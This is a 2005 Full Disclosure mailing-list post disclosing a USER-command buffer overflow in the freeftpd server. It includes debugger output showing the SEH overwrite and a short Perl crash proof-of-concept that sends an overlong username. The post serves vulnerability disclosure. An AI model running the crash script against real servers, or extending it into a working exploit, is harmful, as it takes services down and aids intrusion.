Full Disclosure mailing list archives
freeftpd USER bufferoverflow
From: barabas mutsonline <barbsie () gmail com>
Date: Wed, 16 Nov 2005 10:56:54 +0100
Hi, While drooling over my new Adriana Lima wallpaper, my tongue accidentally hit my keyboard and more than 1012 chars were sent to the login screen of my freeftpd server (which i use to backup my Adriana Lima pics). Guess what...the server crashed! Luckily I attach ollydbg to every process I have running and ths is what I found: ECX 50505050 EIP 77C460CB msvcrt.77C460CB Log data, item 0 Address=77C460CB Message=Access violation when reading [50505050] 77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX] well, eip doesnt get overwritten, but SEH does: 0012B6CC 41414141 0012B6D0 42424242 0012B6D4 42424242 0012B6D8 43434343 Pointer to next SEH record 0012B6DC 47464544 SE handler EIP 47464544 Log data, item 0 Address=47464544 Message=Access violation when executing [47464544] I leave the exploit coding as an exercise... enjoy sample crash code: #!/usr/bin/perl -w #freeftpd USER buffer overflow #barabas - 2005 use strict; use Net::FTP; my $user="\x41"x1011; $user .="\x44\x45\x46\x47";#overwrite SEH $user .="\x50"x400; my $ftp = Net::FTP->new("127.0.0.1 <http://127.0.0.1>", Debug => 1); $ftp->login("$user","whatevah");
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- freeftpd USER bufferoverflow barabas mutsonline (Nov 16)
- <Possible follow-ups>
- re: freeftpd USER bufferoverflow KF (lists) (Nov 16)
- RE: freeftpd USER bufferoverflow ad (Nov 16)